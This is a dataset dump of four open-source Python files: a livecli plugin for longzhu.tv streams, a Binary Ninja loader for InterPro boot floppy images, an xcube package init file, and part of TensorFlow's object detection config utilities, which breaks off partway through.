| 0.614018
|
9f9ec788fac4fa80210c7d1b7fc51e71e8cb0db2
| 3,561
|
py
|
Python
|
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | 1
|
2019-12-04T11:54:52.000Z
|
2019-12-04T11:54:52.000Z
|
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | null | null | null |
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
from livecli.plugin import Plugin
from livecli.plugin.api import http, validate
from livecli.stream import HLSStream, HTTPStream, RTMPStream
__livecli_docs__ = {
"domains": [
"star.longzhu.tv",
"star.longzhu.com",
],
"geo_blocked": [],
"notes": "",
"live": True,
"vod": False,
"last_update": "2017-02-17",
}
CHANNEL_INFO_URL = "http://api.plu.cn/tga/streams/%s"
QQ_STREAM_INFO_URL = "http://info.zb.qq.com/?cnlid=%d&cmd=2&stream=%d&system=1&sdtfrom=113"
PLU_STREAM_INFO_URL = "http://livestream.plu.cn/live/getlivePlayurl?roomId=%d"
_quality_re = re.compile(r"\d+x(\d+)$")
_url_re = re.compile(r"http://star\.longzhu\.(?:tv|com)/(m\/)?(?P<domain>[a-z0-9]+)")
_channel_schema = validate.Schema(
{
"data": validate.any(None, {
"channel": validate.any(None, {
"id": int,
"vid": int
})
})
},
validate.get("data")
)
_plu_schema = validate.Schema(
{
"playLines": [{
"urls": [{
"securityUrl": validate.url(scheme=validate.any("rtmp", "http")),
"resolution": validate.text,
"ext": validate.text
}]
}]
}
)
_qq_schema = validate.Schema(
{
validate.optional("playurl"): validate.url(scheme="http")
},
validate.get("playurl")
)
STREAM_WEIGHTS = {
"middle": 540,
"source": 1080
}
class Tga(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
@classmethod
def stream_weight(cls, stream):
if stream in STREAM_WEIGHTS:
return STREAM_WEIGHTS[stream], "tga"
return Plugin.stream_weight(stream)
def _get_quality(self, label):
match = _quality_re.search(label)
if match:
return match.group(1) + "p"
else:
return "live"
def _get_channel_id(self, domain):
channel_info = http.get(CHANNEL_INFO_URL % str(domain))
info = http.json(channel_info, schema=_channel_schema)
if info is None:
return 0, 0
return info['channel']['vid'], info['channel']['id']
def _get_qq_streams(self, vid):
res = http.get(QQ_STREAM_INFO_URL % (vid, 1))
info = http.json(res, schema=_qq_schema)
yield "live", HTTPStream(self.session, info)
res = http.get(QQ_STREAM_INFO_URL % (vid, 2))
info = http.json(res, schema=_qq_schema)
yield "live", HLSStream(self.session, info)
def _get_plu_streams(self, cid):
res = http.get(PLU_STREAM_INFO_URL % cid)
info = http.json(res, schema=_plu_schema)
for source in info["playLines"][0]["urls"]:
quality = self._get_quality(source["resolution"])
if source["ext"] == "m3u8":
yield quality, HLSStream(self.session, source["securityUrl"])
elif source["ext"] == "flv":
yield quality, HTTPStream(self.session, source["securityUrl"])
elif source["ext"] == "rtmp":
yield quality, RTMPStream(self.session, {
"rtmp": source["securityUrl"],
"live": True
})
def _get_streams(self):
match = _url_re.match(self.url)
domain = match.group('domain')
vid, cid = self._get_channel_id(domain)
if vid != 0:
return self._get_qq_streams(vid)
elif cid != 0:
return self._get_plu_streams(cid)
__plugin__ = Tga
| 27.820313
| 91
| 0.570626
|
61c292782fc63d0f9a1c216a95fcfa91d2603252
| 12,138
|
py
|
Python
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 5
|
2018-02-23T08:28:33.000Z
|
2022-01-10T10:40:25.000Z
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 1
|
2019-07-04T20:11:38.000Z
|
2019-07-04T20:11:38.000Z
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 1
|
2018-04-08T20:43:47.000Z
|
2018-04-08T20:43:47.000Z
|
import struct
import traceback
from binaryninja.platform import Platform
from binaryninja.binaryview import BinaryView
from binaryninja.types import Symbol
from binaryninja.log import log_error, log_info
from binaryninja.enums import (SegmentFlag, SymbolType, SectionSemantics)
from unpack import unpack
# CLIPPER executables loaded from disk images. Currently only supports the
# Sapphire rebuild boot floppy (I/O system monitor and blue screen utilities)
# but should be extended to support others such as FDMDISK, etc.
# TODO:
# - inject unpacked data into parent view
# - refactor and complete hardware symbols
class BootFloppy(BinaryView):
name = 'InterPro Bootable Floppy'
long_name = 'InterPro Bootable Floppy'
def __init__(self, data):
BinaryView.__init__(self, parent_view = data, file_metadata = data.file)
@classmethod
def is_valid_for_data(self, data):
hdr = data.read(0, 4)
if len(hdr) < 4:
return False
if hdr[0:4] == 'sane':
return True
return False
def init(self):
self.platform = Platform['interpro-clipper']
self.unpacked = []
try:
# read floppy partition header: floppypar(4)
(magic, partition_count) = struct.unpack('<4sH', self.parent_view.read(0, 6))
for partition_number in range(partition_count):
# read partition information
(par, mod, start_block, end_block) = struct.unpack('<2B2H', self.parent_view.read(6 + partition_number * 6, 6))
log_info('par {:x}.{:x} start_block {} end_block {}'.format(par, mod, start_block, end_block))
# read partition boot block: bootheader(4)
(b_magic, b_checksum, b_processor, b_loadaddr, b_loadsize, b_uinitaddr, b_uinitsize, b_entry, b_time) = struct.unpack(
'<L2H6L', self.parent_view.read(start_block * 512, 32))
log_info(' b_magic 0x{:x} b_checksum 0x{:x} b_processor {} b_loadaddr 0x{:x} b_loadsize 0x{:x} b_uinitaddr 0x{:x} b_uinitsize 0x{:x} b_entry 0x{:x}'.format(
b_magic, b_checksum, b_processor, b_loadaddr, b_loadsize, b_uinitaddr, b_uinitsize, b_entry))
if par == 8 and b_processor == 1:
if mod == 0: # i/o system monitor
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
self.add_auto_segment(b_uinitaddr, b_uinitaddr, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), b_uinitaddr, b_uinitsize, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(b_entry)
elif mod == 2: # blue screen utility
# hard-coded lookup to find copied code block offset based on partition checksum
copy_lookup = {
0xe5c5:0x48d98, # C400
0xb0d0:0x4ed98 # CLIPPER
}
copy_offset = copy_lookup[b_checksum]
copy_size = b_loadsize - copy_offset
copy_address = 0x280000
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, copy_offset, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.boot'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
# copy loaded text
self.add_auto_segment(copy_address, copy_size, (start_block + 1) * 512 + copy_offset, copy_size, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), copy_address, copy_size, SectionSemantics.ReadOnlyCodeSectionSemantics)
# FIXME: for CLIPPER, the erased size should be copy_size + 0x69b00, unknown why
# create an uninitialised data section directly after the copied data
self.add_auto_segment(copy_address + copy_size, 0x71450, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), copy_address + copy_size, 0x71450, SectionSemantics.ReadWriteDataSectionSemantics)
# the first 8 pages contain vectors and hard-coded page mappings
#self.add_auto_segment(0, 0x8000, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
#self.add_auto_section('vectors', 0x0, 0x8000, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(0x8000)
elif par == 0xa:
# Diagnostic disk partition allocation is as follows:
#
# sapphire1.flp sapphire2.flp sapphire2.flp
# mod content mod content mod content
# 0 FDMDISK
# 2 GT/GT+/GTII 2 EDGE II/II+
# 3 Digitizer
# 4 Token Ring
# 5 Hard PC
# 11 CLIPPER
# 12 Clock/Calendar
# 13 Ethernet
# 15 I/O Gate Array
# 16 Memory
# 17 Plotter
# 18 SCSI
# 19 Serial
if b_uinitsize > 0: # unpacked fdmdisk module
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
self.add_auto_segment(b_uinitaddr, b_uinitsize, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), b_uinitaddr, b_uinitsize, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(b_entry)
elif mod not in [3,4,5]: # packed fdmdisk module (3, 4, and 5 use the same address range, so can't be loaded together)
# temporarily map the boot segment
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable)
# read packed data offset, unpacked entry point and unpacked bss address/size
(packed_addr, unpacked_entry, unpacked_bss_addr, unpacked_bss_size) = struct.unpack('<4L', self.read(b_loadaddr, 16))
# read unpacked start address and packed length
(unpacked_addr, packed_size) = struct.unpack('<2L', self.read(packed_addr, 8))
sections = []
while packed_size > 0:
# unpack a block of packed data
unpacked_data = unpack(self.read(packed_addr + 8, packed_size))
log_info(' unpacked data addr 0x{:x} size 0x{:x}'.format(unpacked_addr, len(unpacked_data)))
# record the unpacked start address/end addresses and data
section = [x for x in sections if x[0] + len(x[1]) == unpacked_addr]
if len(section) == 1:
log_info(' merging with existing unpacked data {:x}'.format(section[0][0]))
section[0][1] += unpacked_data
else:
log_info(' creating new unpacked data range {:x} length {:x}'.format(unpacked_addr, len(unpacked_data)))
sections += [[unpacked_addr, unpacked_data]]
# find the next packed data block
packed_addr += (packed_size + 0x17) & ~0xf
(unpacked_addr, packed_size) = struct.unpack('<2L', self.read(packed_addr, 8))
# create sections
self.unpacked += sections
for unpacked in sections:
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), unpacked[0], len(unpacked[1]), SectionSemantics.ReadOnlyCodeSectionSemantics)
# unmap the boot segment
self.remove_auto_segment(b_loadaddr, b_loadsize)
self.add_auto_segment(unpacked_bss_addr, unpacked_bss_size, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), unpacked_bss_addr, unpacked_bss_size, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(unpacked_entry)
# test symbol creation
for name,address in [
('timer2', 0x7f0fff5c),
('timer3', 0x7f0fff5e),
('scsi', 0x7f0fff60),
('floppy', 0x7f0fff62),
('plotter', 0x7f0fff64),
('cbus0', 0x7f0fff66),
('cbus1', 0x7f0fff68),
('cbus2', 0x7f0fff6a),
('vb', 0x7f0fff6c),
('ext7', 0x7f0fff6e),
('cbus3', 0x7f0fff70),
('rtc', 0x7f0fff72),
('60Hz', 0x7f0fff74),
('mouse', 0x7f0fff76),
('timer0', 0x7f0fff78),
('timer1', 0x7f0fff7a),
('serial_dma', 0x7f0fff7c),
('serial', 0x7f0fff7e),
('ethernet', 0x7f0fff80)]:
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address + 0, 'ioga_icr_' + name))
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address + 1, 'ioga_icr_' + name + '_ctrl'))
for name,address in [
('prescaler', 0x7f0fff88),
('timer0', 0x7f0fff8c),
('timer1', 0x7f0fff90)]:
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address, 'ioga_' + name))
return True
except:
log_error(traceback.format_exc())
return False
def perform_is_executable(self):
return True
def perform_get_length(self):
return sum(len(x[1]) for x in self.unpacked)
def perform_get_start(self):
return min(x[0] for x in self.unpacked)
def perform_read(self, addr, length):
unpacked_range = [x for x in self.unpacked if x[0] <= addr < x[0] + len(x[1]) and x[0] <= addr + length <= x[0] + len(x[1])]
if len(unpacked_range) == 1:
start_offset = addr - unpacked_range[0][0]
end_offset = start_offset + length
return unpacked_range[0][1][start_offset:end_offset]
else:
return ''
| 55.935484
| 279
| 0.570934
|
9664d2e1b8cc7b74c4a8d92978a0280e44aedb11
| 2,315
|
py
|
Python
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 97
|
2018-06-26T13:02:55.000Z
|
2022-03-26T21:03:13.000Z
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 524
|
2018-11-09T12:00:08.000Z
|
2022-03-31T17:00:13.000Z
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 15
|
2019-07-09T08:46:03.000Z
|
2022-02-07T18:47:34.000Z
|
# The MIT License (MIT)
# Copyright (c) 2021 by the xcube development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# noinspection PyUnresolvedReferences
from xcube.core.byoa import CodeConfig
# noinspection PyUnresolvedReferences
from xcube.core.byoa import FileSet
# noinspection PyUnresolvedReferences
from xcube.core.store.descriptor import DatasetDescriptor
from .config import CallbackConfig
from .config import CubeConfig
from .config import InputConfig
from .config import OutputConfig
from .error import CubeGeneratorError
from .generator import CubeGenerator
from .local.generator import LocalCubeGenerator
from .processor import DatasetProcessor
from .processor import METHOD_NAME_DATASET_PROCESSOR
from .processor import METHOD_NAME_PARAMS_SCHEMA_GETTER
from .remote.config import ServiceConfig
from .remote.config import ServiceConfigLike
from .remote.generator import RemoteCubeGenerator
from .remote.response import CostEstimation
from .remote.response import CubeInfoWithCosts
from .remote.response import CubeInfoWithCostsResult
from .request import CubeGeneratorRequest
from .request import CubeGeneratorRequestLike
from .response import CubeGeneratorResult
from .response import CubeInfo
from .response import CubeInfoResult
from .response import CubeReference
| 45.392157
| 81
| 0.825918
|
7e0ea010a22b6a48cc7ae681b1acf0aebdb6b391
| 52,607
|
py
|
Python
|
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for reading and updating configuration files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from google.protobuf import text_format
import tensorflow.compat.v1 as tf
from tensorflow.python.lib.io import file_io
from object_detection.protos import eval_pb2
from object_detection.protos import graph_rewriter_pb2
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
def get_image_resizer_config(model_config):
"""Returns the image resizer config from a model config.
Args:
model_config: A model_pb2.DetectionModel.
Returns:
An image_resizer_pb2.ImageResizer.
Raises:
ValueError: If the model type is not recognized.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "image_resizer"):
return getattr(meta_architecture_config, "image_resizer")
else:
raise ValueError("{} has no image_reszier_config".format(
meta_architecture))
def get_spatial_image_size(image_resizer_config):
"""Returns expected spatial size of the output image from a given config.
Args:
image_resizer_config: An image_resizer_pb2.ImageResizer.
Returns:
A list of two integers of the form [height, width]. `height` and `width` are
set to -1 if they cannot be determined during graph construction.
Raises:
ValueError: If the model type is not recognized.
"""
if image_resizer_config.HasField("fixed_shape_resizer"):
return [
image_resizer_config.fixed_shape_resizer.height,
image_resizer_config.fixed_shape_resizer.width
]
if image_resizer_config.HasField("keep_aspect_ratio_resizer"):
if image_resizer_config.keep_aspect_ratio_resizer.pad_to_max_dimension:
return [image_resizer_config.keep_aspect_ratio_resizer.max_dimension] * 2
else:
return [-1, -1]
if image_resizer_config.HasField(
"identity_resizer") or image_resizer_config.HasField(
"conditional_shape_resizer"):
return [-1, -1]
raise ValueError("Unknown image resizer type.")
def get_max_num_context_features(model_config):
"""Returns maximum number of context features from a given config.
Args:
model_config: A model config file.
Returns:
An integer specifying the max number of context features if the model
config contains context_config, None otherwise
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "context_config"):
return meta_architecture_config.context_config.max_num_context_features
def get_context_feature_length(model_config):
"""Returns context feature length from a given config.
Args:
model_config: A model config file.
Returns:
An integer specifying the fixed length of each feature in context_features.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "context_config"):
return meta_architecture_config.context_config.context_feature_length
def get_configs_from_pipeline_file(pipeline_config_path, config_override=None):
"""Reads config from a file containing pipeline_pb2.TrainEvalPipelineConfig.
Args:
pipeline_config_path: Path to pipeline_pb2.TrainEvalPipelineConfig text
proto.
config_override: A pipeline_pb2.TrainEvalPipelineConfig text proto to
override pipeline_config_path.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_config`. Value are the
corresponding config objects.
"""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
with tf.gfile.GFile(pipeline_config_path, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, pipeline_config)
if config_override:
text_format.Merge(config_override, pipeline_config)
return create_configs_from_pipeline_proto(pipeline_config)
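def _example_load_pipeline_configs(pipeline_config_path):
  # Editor's usage sketch, not part of the original module: loads a pipeline
  # config from the caller-supplied path and pulls out a few commonly used
  # pieces of it.
  configs = get_configs_from_pipeline_file(pipeline_config_path)
  model_config = configs["model"]
  train_config = configs["train_config"]
  return model_config, train_config.batch_size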
def clear_fine_tune_checkpoint(pipeline_config_path,
new_pipeline_config_path):
"""Clears fine_tune_checkpoint and writes a new pipeline config file."""
configs = get_configs_from_pipeline_file(pipeline_config_path)
configs["train_config"].fine_tune_checkpoint = ""
configs["train_config"].load_all_detection_checkpoint_vars = False
pipeline_proto = create_pipeline_proto_from_configs(configs)
with tf.gfile.Open(new_pipeline_config_path, "wb") as f:
f.write(text_format.MessageToString(pipeline_proto))
def update_fine_tune_checkpoint_type(train_config):
"""Set `fine_tune_checkpoint_type` using `from_detection_checkpoint`.
`train_config.from_detection_checkpoint` field is deprecated. For backward
compatibility, this function sets `train_config.fine_tune_checkpoint_type`
based on `train_config.from_detection_checkpoint`.
Args:
train_config: train_pb2.TrainConfig proto object.
"""
if not train_config.fine_tune_checkpoint_type:
if train_config.from_detection_checkpoint:
train_config.fine_tune_checkpoint_type = "detection"
else:
train_config.fine_tune_checkpoint_type = "classification"
def create_configs_from_pipeline_proto(pipeline_config):
"""Creates a configs dictionary from pipeline_pb2.TrainEvalPipelineConfig.
Args:
pipeline_config: pipeline_pb2.TrainEvalPipelineConfig proto object.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_configs`. Value are
the corresponding config objects or list of config objects (only for
eval_input_configs).
"""
configs = {}
configs["model"] = pipeline_config.model
configs["train_config"] = pipeline_config.train_config
configs["train_input_config"] = pipeline_config.train_input_reader
configs["eval_config"] = pipeline_config.eval_config
configs["eval_input_configs"] = pipeline_config.eval_input_reader
# Keeps eval_input_config only for backwards compatibility. All clients should
# read eval_input_configs instead.
if configs["eval_input_configs"]:
configs["eval_input_config"] = configs["eval_input_configs"][0]
if pipeline_config.HasField("graph_rewriter"):
configs["graph_rewriter_config"] = pipeline_config.graph_rewriter
return configs
def get_graph_rewriter_config_from_file(graph_rewriter_config_file):
"""Parses config for graph rewriter.
Args:
graph_rewriter_config_file: file path to the graph rewriter config.
Returns:
graph_rewriter_pb2.GraphRewriter proto
"""
graph_rewriter_config = graph_rewriter_pb2.GraphRewriter()
with tf.gfile.GFile(graph_rewriter_config_file, "r") as f:
text_format.Merge(f.read(), graph_rewriter_config)
return graph_rewriter_config
def create_pipeline_proto_from_configs(configs):
"""Creates a pipeline_pb2.TrainEvalPipelineConfig from configs dictionary.
This function performs the inverse operation of
create_configs_from_pipeline_proto().
Args:
configs: Dictionary of configs. See get_configs_from_pipeline_file().
Returns:
A fully populated pipeline_pb2.TrainEvalPipelineConfig.
"""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.CopyFrom(configs["model"])
pipeline_config.train_config.CopyFrom(configs["train_config"])
pipeline_config.train_input_reader.CopyFrom(configs["train_input_config"])
pipeline_config.eval_config.CopyFrom(configs["eval_config"])
pipeline_config.eval_input_reader.extend(configs["eval_input_configs"])
if "graph_rewriter_config" in configs:
pipeline_config.graph_rewriter.CopyFrom(configs["graph_rewriter_config"])
return pipeline_config
def save_pipeline_config(pipeline_config, directory):
"""Saves a pipeline config text file to disk.
Args:
pipeline_config: A pipeline_pb2.TrainEvalPipelineConfig.
directory: The model directory into which the pipeline config file will be
saved.
"""
if not file_io.file_exists(directory):
file_io.recursive_create_dir(directory)
pipeline_config_path = os.path.join(directory, "pipeline.config")
config_text = text_format.MessageToString(pipeline_config)
with tf.gfile.Open(pipeline_config_path, "wb") as f:
tf.logging.info("Writing pipeline config file to %s",
pipeline_config_path)
f.write(config_text)
def get_configs_from_multiple_files(model_config_path="",
train_config_path="",
train_input_config_path="",
eval_config_path="",
eval_input_config_path="",
graph_rewriter_config_path=""):
"""Reads training configuration from multiple config files.
Args:
model_config_path: Path to model_pb2.DetectionModel.
train_config_path: Path to train_pb2.TrainConfig.
train_input_config_path: Path to input_reader_pb2.InputReader.
eval_config_path: Path to eval_pb2.EvalConfig.
eval_input_config_path: Path to input_reader_pb2.InputReader.
graph_rewriter_config_path: Path to graph_rewriter_pb2.GraphRewriter.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_config`. Key/Values are
returned only for valid (non-empty) strings.
"""
configs = {}
if model_config_path:
model_config = model_pb2.DetectionModel()
with tf.gfile.GFile(model_config_path, "r") as f:
text_format.Merge(f.read(), model_config)
configs["model"] = model_config
if train_config_path:
train_config = train_pb2.TrainConfig()
with tf.gfile.GFile(train_config_path, "r") as f:
text_format.Merge(f.read(), train_config)
configs["train_config"] = train_config
if train_input_config_path:
train_input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(train_input_config_path, "r") as f:
text_format.Merge(f.read(), train_input_config)
configs["train_input_config"] = train_input_config
if eval_config_path:
eval_config = eval_pb2.EvalConfig()
with tf.gfile.GFile(eval_config_path, "r") as f:
text_format.Merge(f.read(), eval_config)
configs["eval_config"] = eval_config
if eval_input_config_path:
eval_input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(eval_input_config_path, "r") as f:
text_format.Merge(f.read(), eval_input_config)
configs["eval_input_configs"] = [eval_input_config]
if graph_rewriter_config_path:
configs["graph_rewriter_config"] = get_graph_rewriter_config_from_file(
graph_rewriter_config_path)
return configs
def get_number_of_classes(model_config):
"""Returns the number of classes for a detection model.
Args:
model_config: A model_pb2.DetectionModel.
Returns:
Number of classes.
Raises:
ValueError: If the model type is not recognized.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "num_classes"):
return meta_architecture_config.num_classes
else:
raise ValueError("{} does not have num_classes.".format(meta_architecture))
def get_optimizer_type(train_config):
"""Returns the optimizer type for training.
Args:
train_config: A train_pb2.TrainConfig.
Returns:
The type of the optimizer
"""
return train_config.optimizer.WhichOneof("optimizer")
def get_learning_rate_type(optimizer_config):
"""Returns the learning rate type for training.
Args:
optimizer_config: An optimizer_pb2.Optimizer.
Returns:
The type of the learning rate.
"""
return optimizer_config.learning_rate.WhichOneof("learning_rate")
def _is_generic_key(key):
"""Determines whether the key starts with a generic config dictionary key."""
for prefix in [
"graph_rewriter_config",
"model",
"train_input_config",
"train_config",
"eval_config"]:
if key.startswith(prefix + "."):
return True
return False
def _check_and_convert_legacy_input_config_key(key):
"""Checks key and converts legacy input config update to specific update.
Args:
key: string indicates the target of update operation.
Returns:
is_valid_input_config_key: A boolean indicating whether the input key is to
update input config(s).
key_name: 'eval_input_configs' or 'train_input_config' string if
is_valid_input_config_key is true. None if is_valid_input_config_key is
false.
input_name: always returns None since legacy input config key never
specifies the target input config. Keeping this output only to match the
output form defined for input config update.
field_name: the field name in input config. `key` itself if
is_valid_input_config_key is false.
"""
key_name = None
input_name = None
field_name = key
is_valid_input_config_key = True
if field_name == "train_shuffle":
key_name = "train_input_config"
field_name = "shuffle"
elif field_name == "eval_shuffle":
key_name = "eval_input_configs"
field_name = "shuffle"
elif field_name == "train_input_path":
key_name = "train_input_config"
field_name = "input_path"
elif field_name == "eval_input_path":
key_name = "eval_input_configs"
field_name = "input_path"
elif field_name == "append_train_input_path":
key_name = "train_input_config"
field_name = "input_path"
elif field_name == "append_eval_input_path":
key_name = "eval_input_configs"
field_name = "input_path"
else:
is_valid_input_config_key = False
return is_valid_input_config_key, key_name, input_name, field_name
def check_and_parse_input_config_key(configs, key):
Checks key and returns specific fields if key is a valid input config update.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key: string indicates the target of update operation.
Returns:
is_valid_input_config_key: A boolean indicating whether the input key is to
update input config(s).
key_name: 'eval_input_configs' or 'train_input_config' string if
is_valid_input_config_key is true. None if is_valid_input_config_key is
false.
input_name: the name of the input config to be updated. None if
is_valid_input_config_key is false.
field_name: the field name in input config. `key` itself if
is_valid_input_config_key is false.
Raises:
ValueError: when the input key format doesn't match any known formats.
ValueError: if key_name doesn't match 'eval_input_configs' or
'train_input_config'.
ValueError: if input_name doesn't match any name in train or eval input
configs.
ValueError: if field_name doesn't match any supported fields.
"""
key_name = None
input_name = None
field_name = None
fields = key.split(":")
if len(fields) == 1:
field_name = key
return _check_and_convert_legacy_input_config_key(key)
elif len(fields) == 3:
key_name = fields[0]
input_name = fields[1]
field_name = fields[2]
else:
raise ValueError("Invalid key format when overriding configs.")
# Checks if key_name is valid for specific update.
if key_name not in ["eval_input_configs", "train_input_config"]:
raise ValueError("Invalid key_name when overriding input config.")
# Checks if input_name is valid for specific update. For train input config it
# should match configs[key_name].name, for eval input configs it should match
# the name field of one of the eval_input_configs.
if isinstance(configs[key_name], input_reader_pb2.InputReader):
is_valid_input_name = configs[key_name].name == input_name
else:
is_valid_input_name = input_name in [
eval_input_config.name for eval_input_config in configs[key_name]
]
if not is_valid_input_name:
raise ValueError("Invalid input_name when overriding input config.")
# Checks if field_name is valid for specific update.
if field_name not in [
"input_path", "label_map_path", "shuffle", "mask_type",
"sample_1_of_n_examples"
]:
raise ValueError("Invalid field_name when overriding input config.")
return True, key_name, input_name, field_name
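def _example_parse_input_config_keys(configs):
  # Editor's usage sketch, not part of the original module: shows the two
  # accepted key formats. The reader name "eval_coco" is illustrative and must
  # match the `name` field of one of the eval input readers in `configs`.
  specific = check_and_parse_input_config_key(
      configs, "eval_input_configs:eval_coco:input_path")
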